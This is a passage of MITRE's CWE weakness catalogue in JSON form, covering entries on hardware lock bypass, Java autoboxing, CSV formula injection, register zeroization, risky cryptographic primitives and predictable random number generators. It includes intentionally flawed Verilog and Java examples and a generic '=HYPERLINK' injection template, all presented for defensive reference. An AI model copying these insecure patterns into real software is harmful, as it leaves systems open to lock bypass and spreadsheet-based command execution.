15px;"}},{"#text":"Data_out <= 16\'h0000;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (write & (~lock_status | scan_mode | debug_unlocked) ) // Register protected by Lock bit input, overrides supported for scan_mode & debug_unlocked","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out <= Data_in;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~write)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out <= Data_out;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","endmodule"]},{"#text":"Either remove the debug and scan mode overrides or protect enabling of these modes so that only trusted and authorized users may enable these modes.","attr":{"@_Nature":"good"}}],"Body_Text":"If either the scan_mode or the debug_unlocked modes can be triggered by software, then the lock protection may be bypassed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1235":{"attr":{"@_ID":"1235","@_Name":"Incorrect Use of Autoboxing and Unboxing for Performance Critical Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations.","Extended_Description":{"xhtml:p":["Languages such as Java and C# support automatic conversion through their respective compilers from primitive types into objects of the corresponding wrapper classes, and vice versa. For example, a compiler might convert an int to Integer (called autoboxing) or an Integer to int (called unboxing). This eliminates forcing the programmer to perform these conversions manually, which makes the code cleaner.","However, this feature comes at a cost of performance and can lead to resource exhaustion and impact availability when used with generic collections. Therefore, they should not be used for scientific computing or other performance critical operations. They are only suited to support \\"impedance mismatch\\" between reference types and primitives."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The programmer may use boxed primitives when not strictly necessary."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance"],"Likelihood":"Low","Note":"Incorrect autoboxing/unboxing would result in reduced performance, which sometimes can lead to resource consumption issues."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use of boxed primitives should be limited to certain situations such as when calling methods with typed parameters. Examine the use of boxed primitives prior to use. Use SparseArrays or ArrayMap instead of HashMap to avoid performance overhead."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Java has a boxed primitive for each primitive type. A long can be represented with the boxed primitive Long. Issues arise where boxed primitives are used when not strictly necessary.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Long count = 0L;for (long i = 0; i < Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the above loop, we see that the count variable is declared as a boxed primitive. This causes autoboxing on the line that increments. This causes execution to be magnitudes less performant (time and possibly space) than if the \\"long\\" primitive was used to declare the count variable, which can impact availability of a resource."},{"Intro_Text":"This code uses primitive long which fixes the issue.","Example_Code":{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"long count = 0L;for (long i = 0; i < Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"EXP04-J","Entry_Name":"Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1051"}},{"attr":{"@_External_Reference_ID":"REF-1052"}}]},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1236":{"attr":{"@_ID":"1236","@_Name":"Improper Neutralization of Formula Elements in a CSV File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software.","Extended_Description":"User-provided data is often saved to traditional databases. This data can be exported to a CSV file, which allows users to read the data using spreadsheet software such as Excel, Numbers, or Calc. This software interprets entries beginning with \'=\' as formulas, which are then executed by the spreadsheet software. The software\'s formula language often allows methods to access hyperlinks or the local command line, and frequently allows enough characters to invoke an entire script. Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"CSV Injection"},{"Term":"Formula Injection"},{"Term":"Excel Macro Injection"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The weakness is in the implementation of a software\'s CSV export feature, in particular how it formats formula entries as the output gets flattened into a text file."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Execute Unauthorized Code or Commands"],"Likelihood":"Low","Note":"Current versions of Excel warn users of untrusted content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include \'=\' (equal), \'+\' (plus), \'-\' (minus), and \'@\' (at).","Effectiveness":"Moderate","Effectiveness_Notes":"Unfortunately, there is no perfect solution, since different spreadsheet products act differently."},{"Phase":"Implementation","Description":"If a field starts with a formula character, prepend it with a \' (single apostrophe), which prevents Excel from executing the formula.","Effectiveness":"Moderate","Effectiveness_Notes":"It is not clear how effective this mitigation is with other spreadsheet software."},{"Phase":"Architecture and Design","Description":"Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.","Effectiveness":"Limited","Effectiveness_Notes":"This mitigation has limited effectiveness because it often depends on end users opening spreadsheet software safely."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Hyperlinks or other commands can be executed when a cell begins with the formula identifier, \'=\'","Example_Code":[{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:p":"=HYPERLINK(link_location, [friendly_name])"},{"attr":{"@_Nature":"good"},"xhtml:p":"HYPERLINK(link_location, [friendly_name])"}],"Body_Text":"Stripping the leading equals sign, or simply not executing formulas from untrusted sources, impedes malicious activity."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12134","Description":"Low privileged user can trigger CSV injection through a contact form field value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12134"},{"Reference":"CVE-2019-4521","Description":"Cloud management product allows arbitrary command execution via CSV injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4521"},{"Reference":"CVE-2019-17661","Description":"CSV injection in content management system via formula code in a first or last name","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17661"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-21"}},{"attr":{"@_External_Reference_ID":"REF-22"}},{"attr":{"@_External_Reference_ID":"REF-23"}},{"attr":{"@_External_Reference_ID":"REF-24"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-11-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"}]}},"1239":{"attr":{"@_ID":"1239","@_Name":"Improper Zeroization of Hardware Register","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes.","Extended_Description":"Hardware logic operates on data stored in registers local to the hardware block. Most hardware IPs, including cryptographic accelerators, rely on registers to buffer I/O, store intermediate values, and interface with software. The result of this is that sensitive information, such as passwords or encryption keys, can exist in locations not transparent to the user of the hardware logic. When a different entity obtains access to the IP due to a change in operating mode or conditions, the new entity can extract information belonging to the previous user if no mechanisms are in place to clear register contents. It is important to clear information stored in the hardware if a physical attack on the product is detected, or if the user of the hardware block changes. The process of clearing register contents in a hardware IP is referred to as zeroization in standards for cryptographic hardware modules such as FIPS-140-2 [REF-267].","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Lack of hardware mechanisms to zeroize or clear registers in the design or specification."},{"Phase":"Implementation","Note":"Mechanisms to zeroize and clear registers are in the design but implemented incorrectly."},{"Phase":"Operation","Note":"Hardware-provided zeroization mechanisms are not used appropriately by the IP user (ex. firmware), or data remanence issues are not taken into account."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"The consequences will depend on the information disclosed due to the vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Every register potentially containing sensitive information must have a policy specifying how and when information is cleared, in addition to clarifying if it is the responsibility of the hardware logic or IP user to initiate the zeroization procedure at the appropriate time.","Effectiveness_Notes":"Unfortunately, data disclosure can occur even after information has been overwritten/zeroized from the digital perspective. Physical characteristics of the memory can reveal the history of previously written data. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree that even if the original data is erased it can still be recovered through physical characterization of the memory cells [REF-1055]."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a hardware IP for implementing an encryption routine works as expected, but it leaves the intermediate results in some registers that can be accessed. Exactly why this access happens is immaterial - it might be unintentional or intentional, where the designer wanted a \\"quick fix\\" for something."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-02-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1240":{"attr":{"@_ID":"1240","@_Name":"Use of a Cryptographic Primitive with a Risky Implementation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.","Extended_Description":{"xhtml:p":["Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of \\"primitive\\" can vary depending on point of view. See \\"Terminology Notes\\" for further explanation of some concepts.","Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time.","If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is \\"broken\\"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack.","Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered. As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly.","If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences.","This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is primarily introduced during the architecture and design phase as risky primitives are included."},{"Phase":"Implementation","Note":"Even in cases where the Architectural phase properly specifies a cryptographically secure design, the design may be changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High","Note":"Incorrect usage of crypto primitives could render the supposedly encrypted data as unencrypted plaintext in the worst case."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review requirements, documentation, and product design to ensure that primitives are consistent with the strongest-available recommendations from trusted parties. If the product appears to be using custom or proprietary implementations that have not had sufficient public review and approval, then this is a significant concern.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":"Analyze the product to ensure that implementations for each primitive do not contain any known vulnerabilities and are not using any known-weak algorithms, including MD4, MD5, SHA1, DES, etc.","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"For hardware, during the implementation (pre-Silicon / post-Silicon) phase, dynamic tests should be done to ensure that outputs from cryptographic routines are indeed working properly, such as test vectors provided by NIST [REF-1236].","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"It needs to be determined if the output of a cryptographic primitive is lacking entropy, which is one clear sign that something went wrong with the crypto implementation. There exist many methods of measuring the entropy of a bytestream, from sophisticated ones (like calculating Shannon\'s entropy of a sequence of characters) to crude ones (by compressing it and comparing the size of the original bytestream vs. the compressed - a truly random byte stream should not be compressible and hence the uncompressed and compressed bytestreams should be nearly identical in size).","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-55"},"Phase":"Requirements","Description":"Require compliance with the strongest-available recommendations from trusted parties, and require that compliance must be kept up-to-date, since recommendations evolve over time. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Ensure that the architecture/design uses the strongest-available primitives and algorithms from trusted parties. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-54"},"Phase":"Architecture and Design","Description":"Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. As with all cryptographic mechanisms, the source code should be available for analysis. If the algorithm may be compromised when attackers find out how it works, then it is especially weak.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Description":"Try not to use cryptographic algorithms in novel ways or with new modes of operation even when you \\"know\\" it is secure. For example, using SHA-2 chaining to create a 1-time pad for encryption might sound like a good idea, but one should not do this.","Effectiveness":"Discouraged Common Practice"},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design can replace one cryptographic primitive or algorithm with another in the next generation (\\"cryptographic agility\\"). Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software; design the hardware at a replaceable block level.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Do not use outdated or non-compliant cryptography algorithms. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong [REF-267].","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a linear-feedback shift register (LFSR) or other legacy methods as a substitute for an accepted and standard Random Number Generator.","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a checksum as a substitute for a cryptographically generated hash.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted cryptographic library or framework. Industry-standard implementations will save development time and are more likely to avoid errors that can occur during implementation of cryptographic algorithms. However, the library/framework could be used incorrectly during implementation.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for the prevention of common attacks.","Effectiveness":"Moderate"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not store keys in areas accessible to untrusted agents. Carefully manage and protect the cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography algorithm is irrelevant.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Re-using random values may compromise security.","Example_Code":[{"#text":"Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value.","attr":{"@_Nature":"bad"}},{"#text":"If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value.","attr":{"@_Nature":"good"}}],"Body_Text":"While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-4778","Description":"software uses MD5, which is less safe than the default SHA-256 used by related products","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4778"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2019-3907","Description":"identity card uses MD5 hash of a salt and password","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3907"},{"Reference":"CVE-2021-34687","Description":"personal key is transmitted over the network using a substitution cipher","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34687"},{"Reference":"CVE-2020-14254","Description":"product does not disable TLS-RSA cipher suites, allowing decryption of traffic if TLS 2.0 and secure ciphers are not enabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14254"},{"Reference":"CVE-2019-1543","Description":"SSL/TLS library generates 16-byte nonces but reduces them to 12 byte nonces for the ChaCha20-Poly1305 cipher, converting them in a way that violates the cipher\'s requirements for unique nonces.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1543"},{"Reference":"CVE-2017-9267","Description":"LDAP interface allows use of weak ciphers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9267"},{"Reference":"CVE-2017-7971","Description":"SCADA product allows \\"use of outdated cipher suites\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7971"},{"Reference":"CVE-2020-6616","Description":"Chip implementing Bluetooth uses a low-entropy PRNG instead of a hardware RNG, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6616"},{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"},{"Reference":"CVE-2014-4192","Description":"Dual_EC_DRBG implementation in RSA toolkit does not correctly handle certain byte requests, simplifying plaintext recovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4192"},{"Reference":"CVE-2007-6755","Description":"Recommendation for Dual_EC_DRBG algorithm contains point Q constants that could simplify decryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6755"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1227"}},{"attr":{"@_External_Reference_ID":"REF-1226"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-1236","@_Section":"Test Vectors"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Terminology"},"xhtml:p":["Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences.","As of CWE 4.6, CWE terminology around \\"primitives\\" and \\"algorithms\\" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility\'s sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the \\"cryptographic system\\" would be AES-256-GCM with PKCS#5 formatting. The \\"cryptographic function\\" would be AES-256 in the GCM mode of operation, and the \\"algorithm\\" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the \\"cryptographic primitive,\\" because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives."]},{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Research_Gaps"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods and observed examples"}}},"1241":{"attr":{"@_ID":"1241","@_Name":"Use of Predictable Algorithm in Random Number Generator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device uses an algorithm that is predictable and generates a pseudo-random number.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"In many cases, the design originally defines a cryptographically secure random number generator, but is then changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"A true random number generator should be specified for cryptographic algorithms."},{"Phase":"Implementation","Description":"A true random number generator should be implemented for cryptographic algorithms."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a cryptographic function expects random value to be supplied for the crypto algorithm.","Body_Text":"During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"1242":{"attr":{"@_ID":"1242","@_Name":"Inclusion of Undocumented Features or Chicken Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.","Extended_Description":{"xhtml:p":"A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as \\"chicken bits\\". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might 